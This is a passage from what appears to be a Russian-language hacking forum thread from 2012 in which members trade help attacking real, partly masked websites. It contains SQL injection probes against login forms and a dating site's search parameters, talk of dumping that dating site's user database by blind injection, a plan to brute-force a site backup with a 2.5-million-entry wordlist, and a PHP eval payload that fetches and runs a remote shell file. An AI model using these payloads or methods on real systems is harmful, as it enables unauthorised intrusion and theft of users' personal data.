Старый 06.02.2012, 15:20   #1701
Ereeee
 
Аватар для Ereeee
 
Регистрация: 19.01.2012
Сообщений: 110
Репутация: 12
По умолчанию

Спасибо. И последний вопрос:
Цитата:
http://***.com/users'
или
Цитата:
http://***.com/order/
POST:
login=admin&pswd='
Помогите с раскруткой.

Последний раз редактировалось Twost; 21.08.2013 в 15:04..
Ereeee вне форума   Ответить с цитированием
Старый 06.02.2012, 17:12   #1702
Lostnull
 
Регистрация: 15.01.2012
Сообщений: 64
Репутация: 5
По умолчанию

Ereeee
Может лучше в http://***.com/fp/login.php (в авторизации) или так http://***.com/fp/client/getTarif.php?code=MOW&wt=10&frmid=4', сам раскрутить не могу, будет интересно увидеть реализацию иньекции тоже.

Последний раз редактировалось Twost; 21.08.2013 в 15:05..
Lostnull вне форума   Ответить с цитированием
Старый 06.02.2012, 17:35   #1703
Ereeee
 
Аватар для Ereeee
 
Регистрация: 19.01.2012
Сообщений: 110
Репутация: 12
По умолчанию

Решил, что это просто ошибки =( С авторизацией пробую... Похоже понял, что да как...


P.S. Shadowfolder, так переделай.
?id=1 бывает как /id/1 или /page/1 и т.д. Визуально определяй.
Ereeee вне форума   Ответить с цитированием
Старый 07.02.2012, 02:28   #1704
Lostnull
 
Регистрация: 15.01.2012
Сообщений: 64
Репутация: 5
По умолчанию

1) Хочу сбрутить бэкап сайта, составил словарь 2.5кк запросов, я не уроню серв со своим каналом в 700Mb? Сколько потоков ставить?
2) PHPSESSID в пхп, какие допустимые символы в названии? Например везде где читал, пишут цифры и маленькие буквы латинского алфавита, хотя на практике пропускает знак , (запятая)?
Lostnull вне форума   Ответить с цитированием
Старый 07.02.2012, 07:06   #1705
Ereeee
 
Аватар для Ereeee
 
Регистрация: 19.01.2012
Сообщений: 110
Репутация: 12
По умолчанию

Lostnull,
1) Скорее всего твой IP заблокируют.
2) http://phpclub.ru/manrus/f/session-name.html
Цитата:
Имя сессии ссылается на session id в куках и URL. Оно должно содержать только алфавитно-числовые символы; оно должно быть коротким и описательным (например, для пользователей с включёнными предупреждениями о куках).
Ereeee вне форума   Ответить с цитированием
Старый 07.02.2012, 10:15   #1706
BlackFan
 
Аватар для BlackFan
 
Регистрация: 08.07.2010
Сообщений: 354
Репутация: 402
По умолчанию

Цитата:
Сообщение от Lostnull Посмотреть сообщение
2) PHPSESSID в пхп, какие допустимые символы в названии? Например везде где читал, пишут цифры и маленькие буквы латинского алфавита, хотя на практике пропускает знак , (запятая)?
Код:
static char hexconvtab[] = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,-";
BlackFan вне форума   Ответить с цитированием
Старый 07.02.2012, 21:37   #1707
durito
 
Регистрация: 02.03.2011
Сообщений: 76
Репутация: 2
По умолчанию

может у кого мелькнет мысль как тут вывод организовать, так как тянуть базу крупного датинга через blind большой гемморой:

http://***.com/index.php?p=searchresults&stype=quick&idgender=1&i dgenderlf=2&fromagelf=49&toagelf=99+and+1=1+--+

Последний раз редактировалось Twost; 21.08.2013 в 15:05..
durito вне форума   Ответить с цитированием
Старый 08.02.2012, 20:56   #1708
recfrf
 
Регистрация: 30.07.2010
Сообщений: 40
Репутация: 1
По умолчанию

Цитата:
Сообщение от faza02 Посмотреть сообщение
в дб нашел еще пару таблиц, там от форума и вордпресса
на самом сайте их нет, ни форума, ни вп
пытался гуглить контент, ничего хорошего не нашел
есть ли какая-нибудь колонка или таблица конфигурации в пхпбб или вп, где можно линк сайта узнать?
p.s. да, емайлы админов посмотрел тоже, там ничего
p.s.2 да, может быть и форум и блог были, но их удалили, но все же
wp_options > option_value первая или вторая строчка обычно адрес сайта
recfrf вне форума   Ответить с цитированием
Старый 10.02.2012, 14:34   #1709
tipsy
 
Аватар для tipsy
 
Регистрация: 11.07.2010
Сообщений: 415
Репутация: 311
По умолчанию

wp_options > option_name=siteurl option_value="адрес блога"
tipsy вне форума   Ответить с цитированием
Старый 10.02.2012, 17:50   #1710
halk
 
Регистрация: 10.02.2012
Сообщений: 3
Репутация: 0
По умолчанию

ребят есть скрипт который выводит phpinfo(): (http://www.exploit-db.com/exploits/17823/) как подставить свою ссылку на шелл есть фильтрует кавычку ' .
делал так: text={$_{eval(file_get_contents('http://shell/1.txt'));}} все что после первой кавычки отбрасывает фильтр allow_url_fopen= On
halk вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2022, Jelsoft Enterprises Ltd. Перевод: zCarot